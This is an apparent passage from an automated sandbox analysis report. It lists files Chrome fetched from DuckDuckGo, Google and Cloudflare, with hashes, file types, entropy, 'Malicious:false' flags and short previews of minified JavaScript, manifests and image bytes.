                                                                                                                                                            SSDEEP:3072:R/tRtzZakbeShQn5drTYcHFBtdu+haRaGCHi+xeXx31xRvFYWOVD40YBzdIYMV:/RFZakbej5xdHFBtdlhaRaGp+wx35iWi
                                                                                                                                                            MD5:B28CBFB17E4EA07600E7FB8BACED39BF
                                                                                                                                                            SHA1:5CE5B4B20DD16393458A283087DDCAF317227089
                                                                                                                                                            SHA-256:7776228E5B47C3E01A51F3310D0EB74DCE8474A675D542151EB1C293E04637D8
                                                                                                                                                            SHA-512:BABEBA58EA4FC9E197BD049A760679D129810623E063BF0702A0C0716DE218DFBDB522221993940571213760874CA309F3E5B176BC7DF39455646E413B65A625
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/image/pages/home/devices/how-it-works/desktop/web-protection-back-light.png
                                                                                                                                                            Preview:.PNG........IHDR..............!.-....PLTE...................................................................|}....z{.~~...........vx.xz.tv..............................qt..........nr.....................$.....$....)..$$$)........G.%6&"2#.;*%/..=%.!..B)!.ro?-)L3*4.....8".....ur......B1-...Y@9........aRO...fVTR:3.........222G51R5,(........(((....~~......\6&Q- .....}{.om......e<*......ln...YGC..k[X.......]...yw........J95nC/.....YJ'.\MJbE=....q...l5..Z:1..........a;..N>;..eKC.mM???.{C".p_].d.u.M6......{U.R:xG2.W>oI>RC@]]]lQI.bE.g....gIueb.}z........]B.vRe?5.cc....ws{jhzOB....ii...]\.WI..vWN.qn.ONTTT.....JJJY,&.utonn.^P..}....vs.EE.{w.ha...zzz.qiw=<.|u.ol}_X.TT.mh33...hd.gU...._Z..h..qZ..wmccc....r.......lR....sa..~.....zo.NM.q3#._[.@@.33.;.S....tRNS.....".."..zMNoqfa.s....IDATx..............................=8........m.UUUUUUU..r.m....g.E7=C... `./$.#.7Q.I...W........@q......J/fV..-....P......,.*#E..C.-X...JJP,.C".j....?...\Y.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):100116
                                                                                                                                                            Entropy (8bit):5.296065269890977
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:AFsyJY3w2MAgiToj42tMmqpnpq/88r7tcdXLB:AYUMmqpwkdN
                                                                                                                                                            MD5:2B5E9A4ED433EAD00B5C0D44BF9B84D3
                                                                                                                                                            SHA1:13E089842A3CE534E23092086B57FF5FB67C4002
                                                                                                                                                            SHA-256:5BF0A9485DCCD6C4F25AF2D68A9959F19E48C550FE38B5587BAB6823FE5FED53
                                                                                                                                                            SHA-512:15D81F18375B38A17495C8713E5C6071B59CC1F4B26C3555010F40BC7FBC52C84EB7D76F168ECAFB95F2603FAF980549A8EAF7808B73CAF6223EB0BB9531E3AA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/chunks/main-d4b13818a262f8be.js
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[40179],{70227:function(e,t,r){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.addBasePath=function(e,t){0;return a.normalizePathTrailingSlash(n.addPathPrefix(e,""))};var n=r(89782),a=r(24969);("function"===typeof t.default||"object"===typeof t.default&&null!==t.default)&&"undefined"===typeof t.default.__esModule&&(Object.defineProperty(t.default,"__esModule",{value:!0}),Object.assign(t.default,t),e.exports=t.default)},57995:function(e,t,r){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.addLocale=void 0;r(24969);t.addLocale=function(e){return e},("function"===typeof t.default||"object"===typeof t.default&&null!==t.default)&&"undefined"===typeof t.default.__esModule&&(Object.defineProperty(t.default,"__esModule",{value:!0}),Object.assign(t.default,t),e.exports=t.default)},57565:function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.detectDomainLocale=void 0;t.detectDomainLocal
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (3643), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):3643
                                                                                                                                                            Entropy (8bit):4.617214519044779
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:CFIg9tSlAAbgyiSsgWnIlVAYbgptFVn3i:CtoAfkrpV6ptj3i
                                                                                                                                                            MD5:2CCCE833718FE6BAA68CD71D70994EA2
                                                                                                                                                            SHA1:D70E4AD3840ED244AA3808F7AF9A6CA288C5A6FD
                                                                                                                                                            SHA-256:257056F5FEE6445BBD3C2E50CBCD3F3956359E515E26108737B0A37DB973BC0C
                                                                                                                                                            SHA-512:E982233B83A045AEF46AD142A71182C660B05490198A01A4AE93CA9AB9C8CC7FD409BB53A86D6CABFC5BB8A79F34684316C04BC955E69B8CE531587694070117
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/kMKb7Bj0jhFmsUIWJjIQE/_ssgManifest.js
                                                                                                                                                            Preview:self.__SSG_MANIFEST=new Set(["\u002F","\u002F410","\u002F411","\u002F412","\u002F418","\u002F50x","\u002F50x-nginxblock","\u002F50x-tq","\u002F[locale]","\u002F[locale]\u002Faichat\u002Fprivacy-terms","\u002F[locale]\u002Fapp","\u002F[locale]\u002Fcompare-privacy","\u002F[locale]\u002Fdbp","\u002F[locale]\u002Fdbp\u002Fdashboard","\u002F[locale]\u002Fdbp\u002Fprofile","\u002F[locale]\u002Fdbp\u002Fprofile\u002Faddresses","\u002F[locale]\u002Fdbp\u002Fprofile\u002FbirthYear","\u002F[locale]\u002Fdbp\u002Fprofile\u002Fnames","\u002F[locale]\u002Fdbp\u002Fprofile\u002Fwelcome","\u002F[locale]\u002Fextension-success","\u002F[locale]\u002Fidentity-theft-restoration","\u002F[locale]\u002Fidentity-theft-restoration\u002Fabout","\u002F[locale]\u002Fidentity-theft-restoration\u002Fcall","\u002F[locale]\u002Fidentity-theft-restoration\u002Fcall\u002Ffeedback","\u002F[locale]\u002Fidentity-theft-restoration\u002Firis","\u002F[locale]\u002Fmac","\u002F[locale]\u002Fonion-home","\u002F[locale]\u002
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1885)
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):82296
                                                                                                                                                            Entropy (8bit):5.592663724925133
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:brcg844kyv9f9wzJz6uKBLpLON1B5q0VOrGzIF7:AkyvFpLOHqmO2E7
                                                                                                                                                            MD5:E08FA1D1755C4F8570B123C010325195
                                                                                                                                                            SHA1:C496DDD8CBC293564E5FDF2D987833332F554660
                                                                                                                                                            SHA-256:73C96E90B9C6A8E44AA7FA57F5A84A765AB2D1452E11B7B41882F2056B4BC393
                                                                                                                                                            SHA-512:369B54AB94A768D44216962936D3DD948EAA688488D9C279FFCEEC2A2CBD4243FEFB2EADABB6C9D53243C3803EFBB5DC7E234CFC17EC5A9CA549AD4DE4141700
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.7LPvRDgzcqA.O/m=googleapis_proxy/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo9wdgl3D0Cd5pn6O1gZXHwWDc_oTg/cb=gapi.loaded_0?le=scs
                                                                                                                                                            Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x800000, ]);.var ba,fa,ha,na,oa,sa,ua,wa;ba=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};fa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.ma=ha(this);na=function(a,b){if(b)a:{var c=_.ma;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&fa(c,a,{configurable:!0,writable:!0,value:b})}};.na("Symbol",function(a){if(a)r
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (11716), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):11716
                                                                                                                                                            Entropy (8bit):5.592366719580576
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:gnt5cC1Tr7inSFUIoAuDKUdpECe4QjZsktaltyFRXRFp10ZAkL8yJtW3RyGUhDey:gnTLTrvRnuDKUdpw4t3ybXRFp1KhfW3g
                                                                                                                                                            MD5:31A9DEDD8C4F18AAE38E3B891CE04C88
                                                                                                                                                            SHA1:379732A1A9CCADA7B3DCA2EC2631002486995D13
                                                                                                                                                            SHA-256:0E925DB7E2F81BE27A3EFF41A0D7A4E57976054346DF95025152F2C68BB3B4D4
                                                                                                                                                            SHA-512:D4870D5041BAF03E3B4AEE66F2C17C1704DCE5A9EF70EDD45E3ABAF90090A7E153D8BDA0FDFF863B822376E5B02CC2B241808F91B0CA9B9C5412ABC5FB9F1B1A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[84969],{90914:function(e,a,o){"use strict";o.d(a,{Z:function(){return k}});var n,i=o(59499),r=o(67294),t=o(94184),s=o.n(t),c=o(85194),l=o(80912),m=o(18999);function _(){return _=Object.assign?Object.assign.bind():function(e){for(var a=1;a<arguments.length;a++){var o=arguments[a];for(var n in o)Object.prototype.hasOwnProperty.call(o,n)&&(e[n]=o[n])}return e},_.apply(this,arguments)}var p=function(e){return r.createElement("svg",_({fill:"none",viewBox:"0 0 64 64",xmlns:"http://www.w3.org/2000/svg"},e),n||(n=r.createElement("path",{fill:"currentColor",d:"M42.792 14.25c.417 0 1.063.05 1.938.15.894.08 1.908.298 3.04.656 1.133.357 2.286.934 3.459 1.729s2.256 1.908 3.25 3.339c-.1.06-.477.328-1.133.805-.636.477-1.362 1.172-2.177 2.087-.815.894-1.53 2.037-2.146 3.428-.597 1.372-.895 3.011-.895 4.92 0 2.186.378 4.034 1.133 5.544.775 1.511 1.67 2.733 2.683 3.667 1.034.935 1.948 1.62 2.743 2.058.815.417 1.252.636 1.312.655-.02.08-.169.527-.4
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 275 x 175, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):72139
                                                                                                                                                            Entropy (8bit):7.994240231955353
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:1536:Mi/yUMgZUewITXXsUE4OOttKaTydQ5Z+TZyyhj2QlYheoTsZbdJ80iV:B/NUBILXjjvQdQ7+TZy0jllYtYddFiV
                                                                                                                                                            MD5:A81FD7A2339B6B10E9DE498CE6CD8289
                                                                                                                                                            SHA1:6FCA6176709432235C417A51199B064BE6CD53D4
                                                                                                                                                            SHA-256:4C8AA24B526F5F22108BAD2A8E3999E2917DC2A7CEA7560AB28BD56276BABAAC
                                                                                                                                                            SHA-512:5C4ED81CCC85EC43516915E6DB26FF6584474DD20D76A5F5FCDCB5EDC32766F5F9A4EF1D0828AAE43FABF965CE89404566D8251DC11EE70B1499EBF21A119687
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://lh3.googleusercontent.com/BK9B47UjAvyI4GPqmo1kqIAN4fmtgKrJflhcZ0lXYHElpgl9G2N2951auaEIh8HEj3H03nzA6wBWP-j313NhWe55HA=s275-w275-h175
                                                                                                                                                            Preview:.PNG........IHDR...............:.....sBIT....|.d... .IDATx..y.eWU'.]{.{.o.9.T..HHB .a.. .#bP..eThh............m.DA&.m...........IU.*5..{.9{..k...9..._...z....}...Z.5..........`..w13...o.._......(......Y.[3..3.$.9..Rb....uK..D.A......f.S.m....*......"..7.(..A.6!....~/f.*.m....!{w.~.....e..u.j...x!.......l......5....T..Lk*...p.>.9jU@..N=...-.]._....@D.(.@ ...k.../.`...P..!P.G... ..s."..0...........o2...C. .X.R.......B........-...c..HG.)...E.... .....1..'x.4Pd.<..SH..b=.......yNN..=...........m..^..x..0%...d...Y.[n.~w.l._..[..N.....-.....@..`@.,.!.......Dm.....lpJ..J............tP:^.Z..(FMw.....M...*-~......i".Q.yb.,..@.]..]^..s..83..w.y.;.y....S}.....1...X..b)....U.K....{...R*&)tN.(M...:c.:Dk.......q..;...BP..B.....YP..d.G P.J..=.p.X*..bf6.L..G...2..Q....?iT@.(d.....C.'.......X0....)[aE...;.X.&RM-.a..'.!>l.|..I:.m.....:![.P:.?u9.m.g....g...v....}?..ahx0...M..ji..%V/.}.6.....2..=....Yv.....o..I....-.+Wd...'A..(nE b.....2).....5Q..L....h~W.O.Z.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 192x120, components 3
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):9141
                                                                                                                                                            Entropy (8bit):7.933750278306364
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:B5It4RIHjoVwyli0vBF88GHffY+b0MZCtCaIgUGCt2c:B5CAMqvjuX0H8Tg0
                                                                                                                                                            MD5:586129D4C2530E129895C5D87195DE55
                                                                                                                                                            SHA1:6CA57B9FCD06DAC6FFB1BCE227831D82C432B33B
                                                                                                                                                            SHA-256:21BD765132CFE3295A6F93B55490D305BA233220D130FFFF64A2F7A9AFD0EF9A
                                                                                                                                                            SHA-512:621E8CA3F0954D535F3D63DA9E146CC2031C13188065168CAA38FA1348A73FAC4271487E9FD0A52EE65A6D59A2949CDFFF459D79867F1C944E0E4BA3D085361F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://lh3.googleusercontent.com/76r3coCYiap7WJa2ejEtQWUi079TowbnyCcrB1-HZy6Y0bohWW9uND5CaLQynHKafxPA0QZtokCNBJDREctbw7xD=s192-w192-h120
                                                                                                                                                            Preview:......JFIF......................................................................................................................................................x...............................................J.........................!.1...."AQa..#2Uqu....$&36BRs.....4..Dr...STb..................................8........................!1AQq...."3Ra........2BSr..#b.............?..L..T.!...D3.Q.....^.P..0...x.!.P...".J.4..V}>s...`..K.{p.&.N.........e...p..B...Z.,&J.V..2..XHM(.....Ua.O(EN...0....P..!....!8P9....<$.\J.I...BL.*!......2...R.3....|...x..u...R.fx.D..|..B`..I.{p.'.S.f....5.....U..Ei%.EJ..95D.M.).#..\\......S.nb8e..S.E;3Bc..Dd..<Q4..9ijji.g^.G.)........k.j..N...09c.{.j9.g.L.V....&c.....yqvx.5...J}%........h.t....:.=;....3Y\.e]7..+....)b.....Q)}@..;(...+...A...s....)..A..Q.I.....KO[H..L!.H.+.}<[..B..}.C.5.6F..A...L.|rIH.5.Dl.*..83....j)..8.-Y...A.xR].*..s...I..?n..u...r..O+...s. I"......P.E dex.jB...<HV5.%j..B.P..VBpQ.F.....|.C.X..(.5|g.Z[.j...+
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):12533
                                                                                                                                                            Entropy (8bit):4.249354839422192
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:Y0atbFf+XcQap9VkvTA4lHMJNFsnjx/QwWjLc7+Qro7fFka7Ws7i9OFa4:YD+adkvc4GJUGwWjy+xRkCT7AOj
                                                                                                                                                            MD5:35F578A2F12174F1C4653AF1160B0F23
                                                                                                                                                            SHA1:032243A96C70F1B7D2F8851ADF9669ED295F460D
                                                                                                                                                            SHA-256:9F66A4EFF2062030B217CB92883AC820300A1E061D5FB971C531E6717BB7C505
                                                                                                                                                            SHA-512:81899ED26CF38A03278342B0E36DC018334BCECA72561E1D567F406C1699C0E488CBD9B9AE59E4B3BEF9E550E7F9101D24B53EAB96FED7214CA3BF737B4EB2EA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:<svg width="96" height="96" viewBox="0 0 96 96" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M71 51C59.9543 51 51 59.9543 51 71V75.3045C51 77.8866 49.0245 80.0891 46.4462 79.9509C29.9083 79.0647 16 65.067 16 48C16 30.3269 30.3269 16 48 16C65.067 16 79.0647 29.9083 79.9509 46.4462C80.0891 49.0246 77.8866 51 75.3046 51H71Z" fill="#557FF3"/>.<path d="M45.9336 66.3137L49.0397 69.4198C50.2045 70.5846 50.884 72.2347 50.6899 73.7878V75.2874C50.6899 77.888 48.6863 80.0993 46.0911 79.9315C29.6878 78.8709 16 64.9305 16 48C16 30.3269 30.3269 16 48 16C49.5752 16 51.1237 16.1138 52.638 16.3337L53 22C53 24.6208 51.6605 27.5843 49.8163 29.4286L47.7779 31.467C46.0307 33.3112 44.963 35.7379 44.963 38.3587V42.1442C44.963 46.4152 41.4686 49.9095 37.1977 49.9095H23.6084C21.473 49.9095 19.7258 51.6567 19.7258 53.7922V54.1804C19.7258 55.1511 20.1141 56.1218 20.8906 56.8983L24.6762 60.6839C26.5204 62.431 28.9471 63.4988 31.5679 63.4988H39.0419C41.6627 63.4988 44.0894 64.4694 45.9336 66.3137Z" fil
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 865 x 1272, 8-bit colormap, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):58141
                                                                                                                                                            Entropy (8bit):7.975723390948211
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:0ONeqjXSZyi0IoiEvnLi5y7EvgsZ8x8QDkouVB1g9wr:0ONeSi0IX5yogSRQIogBqa
                                                                                                                                                            MD5:00C0C21B1074585D95821C0EEA5B61EC
                                                                                                                                                            SHA1:8681EAA015046F783F48FAE1805AF9D803DEA789
                                                                                                                                                            SHA-256:ECB9BECF438553D4136C18B82EAB32A292E60A15F4206FCAEA4407AC557B0A19
                                                                                                                                                            SHA-512:ED5EC6048F1A790A9102BB17411B2A59437A64201EC63786C3E34B871F756F0BF7A370FC02C665407B46B8993DF3AFC2006598573BD6B76E4389F227E54BE239
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.PNG........IHDR...a...........:.....PLTE...***................................................................................................................................................mL....... !".....222.............X3..._ch............&&&...???............Q2.aaa...9i.XXY........IIIzzz.................................<=>.................ttu.......................MMM...............fgg...ppp~~~.................kJ..]]]........TTT+++......U~...............uwy.......c.........777...CCC...nnn......y[........qP....uV....l......`B...w..x.mM....d......`di......k..Es..........4.................mmmM.<.......vW.b?dhm......k.........imq...jjj.c@...w.....~...............fjo...F.6....k3..6....3...6......3...E[..y5..3.b3....u.i[n..`>U.3........0tRNS..........!%*(#|{v..'..Y;fO..u..............vw...IDATx..............................].Qn...0....7..x.b.....jk.D$a.U.m..D....w...O|.A^....'+|#p.3).....a8.j........B..@......,?.K?..m...
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 275 x 175, 8-bit colormap, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):5431
                                                                                                                                                            Entropy (8bit):7.9513045192817655
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:pzIVfl1uj3junyC5oRXxLLG7EhMcTgXeBmnaI29Jmz/3M1HVMLf0tiEiQNm4:pzoflMH6yegBLThM+jBh9k7cf2WiQNp
                                                                                                                                                            MD5:343C5EECD7B9ABA2A0C251160CCB0BE1
                                                                                                                                                            SHA1:27383A438E2577B488C8B95EA11192FA89E81F70
                                                                                                                                                            SHA-256:DF2885F6341A90C3CF2928D44A927ED243428362B5111E151B6EF44B7CDF9770
                                                                                                                                                            SHA-512:2EE6C9CA285C3E43CA7514054259D7B3DBE58CC5F76BFB59E31904E19190F00C2F52219C36EA52CB4A8FCA7501E9AD959511579100116C32D24DE1BDC27D0248
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://lh3.googleusercontent.com/7hPzZiwbyPBKrlh-CO8rSZAhrubgLChujM45T4JbXgIHwP_5QG_rKYCekCtubWUy6EOJZlvSNGhw8gdNEelJe8Vz=s275-w275-h175
                                                                                                                                                            Preview:.PNG........IHDR................0....sBIT.....O.....PLTE..(.|......(..$.............'.............'.....)..b.w.............U..'.....9...............J5...s..H...bXM.$......0.....sjaJC;iI.........(.[........i.....w..!....zs?....._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(......Y......1....H...:.C2....IDATx..\.{.....4..".{.%FM...eof..a(....u...H...}.r...2d.!C...2d.!C...2d..p..O..g....G..!.r.......o......y...o.....)^...).8.".[.>.TH..b...^R....'._......tQ....=n.2..G...<.a.........z .N....PR.1.).i.#.U///.[=...s{.1Y.....r...NY....L._...f..>.?.).....W X.'.DN.~<.#o.!Y.#.....pb..&.<.yP.D^....J........}..'..p2C+;}.;n6.....}:}...[1......aO&.I{..+j..m....1.....-S:.6........]-g..x......DIq. ....D..W..q...Y.Nm.3^.=.P...(.W.v..1...e:.q.x...Ko..........R.Y....n..h...cd.,0......U.=..Q8..99.,Lf..8..j..<.'.}...'>..Vv.1......<8.y(N..}...Y!4.e2#.=..k...?.'@...8.8%..L...@..k......6..........1.n....VADC~...<./..f_\.c.l. fIz...qp..3..7.&
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (17087), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):17087
                                                                                                                                                            Entropy (8bit):5.044476125235913
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:mqMLNecAO1JRIEzH9wU0ug1bEwiogHxZ0:mfNLAO1JRIEzH9wU0ug1bEwihb0
                                                                                                                                                            MD5:376F808CE1D4E63D3CA50D227630A9E2
                                                                                                                                                            SHA1:9A0458F19796C6AB0982DC661BFCC95091F111F3
                                                                                                                                                            SHA-256:598CD2DB1443FE06D8EF4762CB885B8B5B1D33B70F6B1FAF9099683058392BF5
                                                                                                                                                            SHA-512:05060A020225DCE9A475C546C4AC3DDC9AAFCC9AFCCFBC88C8AE9C13611894C6225954D18265236A048FA8EFF44F2CD70D0A5A308480B3C763D1159891D0CC85
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:self.__BUILD_MANIFEST=function(s,c,a,e,t,i,o,d,b,n,p,l,r,u,f,h,k,j,m,g,w,y,v,_,x,I,B,F,q,A,D,E,L,M,N,S,T,U,Y,C,P,z,G,H,J,K,O,Q,R,V,W,X,Z,$,ss,cs,as,es,ts,is,os,ds,bs,ns,ps,ls,rs,us,fs,hs,ks,js,ms){return{__rewrites:{beforeFiles:[],afterFiles:[],fallback:[]},"/":[c,a,t,d,l,y,s,i,o,u,m,w,v,_,A,D,"static/chunks/pages/index-51d8b73bfd4680e3.js"],"/410":[c,a,t,d,s,i,o,u,m,x,"static/chunks/pages/410-89e085a3951813d0.js"],"/411":[c,a,t,d,s,i,o,u,m,x,"static/chunks/pages/411-2ea5bb8998bf0fdf.js"],"/412":[c,a,t,d,s,i,o,u,m,x,"static/chunks/pages/412-708ec6a6a1160ded.js"],"/418":[c,a,t,d,s,i,o,u,m,x,"static/chunks/pages/418-380ad1499044d78a.js"],"/50x":[c,a,t,d,s,i,o,u,m,x,"static/chunks/pages/50x-27285727e1d42752.js"],"/50x-nginxblock":[c,a,t,d,s,i,o,u,m,x,"static/chunks/pages/50x-nginxblock-060d348dd53458bd.js"],"/50x-tq":[c,a,t,d,s,i,o,u,m,x,"static/chunks/pages/50x-tq-4c99886f1e05cfab.js"],"/_error":["static/chunks/pages/_error-57fd588973025342.js"],"/about":[c,a,t,s,i,o,C,"static/css/df680b
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (47261)
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):47262
                                                                                                                                                            Entropy (8bit):5.3974731018213795
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:+CWIsQ06lHHhw+r9sygguSwodvdq3VE3XYdze9Ddre9eom1CQWpKexThupcubvCR:uQflHBN9sygg1WViPreEM
                                                                                                                                                            MD5:E07E7ED6F75A7D48B3DF3C153EB687EB
                                                                                                                                                            SHA1:4601D83C67CC128D1E75D3E035FB8A3BDFA1EE34
                                                                                                                                                            SHA-256:96BD1C81D59D6AC2EC9F8EBE4937A315E85443667C5728A7CD9053848DD8D3D7
                                                                                                                                                            SHA-512:A0BAF8B8DF121DC9563C5C2E7B6EEE00923A1E684A6C57E3F2A4C73E0D6DD59D7E9952DF5E3CFFFB08195C8475B6ED261769AFB5581F4AB0C0A4CC342EC577C9
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://challenges.cloudflare.com/turnstile/v0/g/ec4b873d446c/api.js
                                                                                                                                                            Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (57403), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):57403
                                                                                                                                                            Entropy (8bit):6.003083462307852
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:T4NfM1sG0VVCX1Az63kzT+gSBvc5Su7BsKJP2qPWxb2X963hjllX7azp/9:TD1sGNc2a+Jhc5R0qefllX72p/9
                                                                                                                                                            MD5:DEC06D18965A6BF15345C5803248C0F1
                                                                                                                                                            SHA1:532D25177E6CB5438F7929FAA5B7D550BB8DB23A
                                                                                                                                                            SHA-256:9D41715960FA1CB9695E40D856B230059EF2681E82EC7D137312247049508649
                                                                                                                                                            SHA-512:D83459DDA1AE09B7C3674B5EF9C272289242C7EA0E58BC9C42EF68DFB36186D090B2D33CC992A8B6B77400954095B308CD798954434F854F5C6E2DB769A134AE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/chunks/20581-c0296de00cc7b441.js
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[20581],{10153:function(M,A,g){"use strict";g.d(A,{dF:function(){return m}});var I=g(59499),i=g(17674),j=g(67294),N=g(44012),t=g(16682),e=g(18999),D=g(87188),c=g(18013),u=g(85194),n=g(32634),L=g(17732),a=g(11262),l=g(80912),C=g(682),r=g(76365),s=g(30178),y=g(76029),x=g(96122),z=g.n(x),o=g(85893),T="set-as-default-header",S={Brave:[(0,o.jsxs)(o.Fragment,{children:[(0,o.jsx)("img",{style:{aspectRatio:"6 / 7"},src:"/_next/static/media/Brave-S1-EN.41cbfdea.png",alt:""}),(0,o.jsx)(s.Z,{as:"p",level:"lg",children:(0,o.jsx)(N.Z,{id:"OzoXm5",values:{menuIcon:(0,o.jsx)(y.Menu,{}),Bold:function(M){return(0,o.jsx)("strong",{children:M})}}})})]}),(0,o.jsxs)(o.Fragment,{children:[(0,o.jsx)("img",{style:{aspectRatio:"6 / 7"},src:"/_next/static/media/Brave-S2-EN.bb4cd5cb.png",alt:""}),(0,o.jsx)(s.Z,{as:"p",level:"lg",children:(0,o.jsx)(N.Z,{id:"KeOiLq",values:{searchIcon:(0,o.jsx)(y.Search,{}),Bold:function(M){return(0,o.jsx)("strong",{children:
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):130003
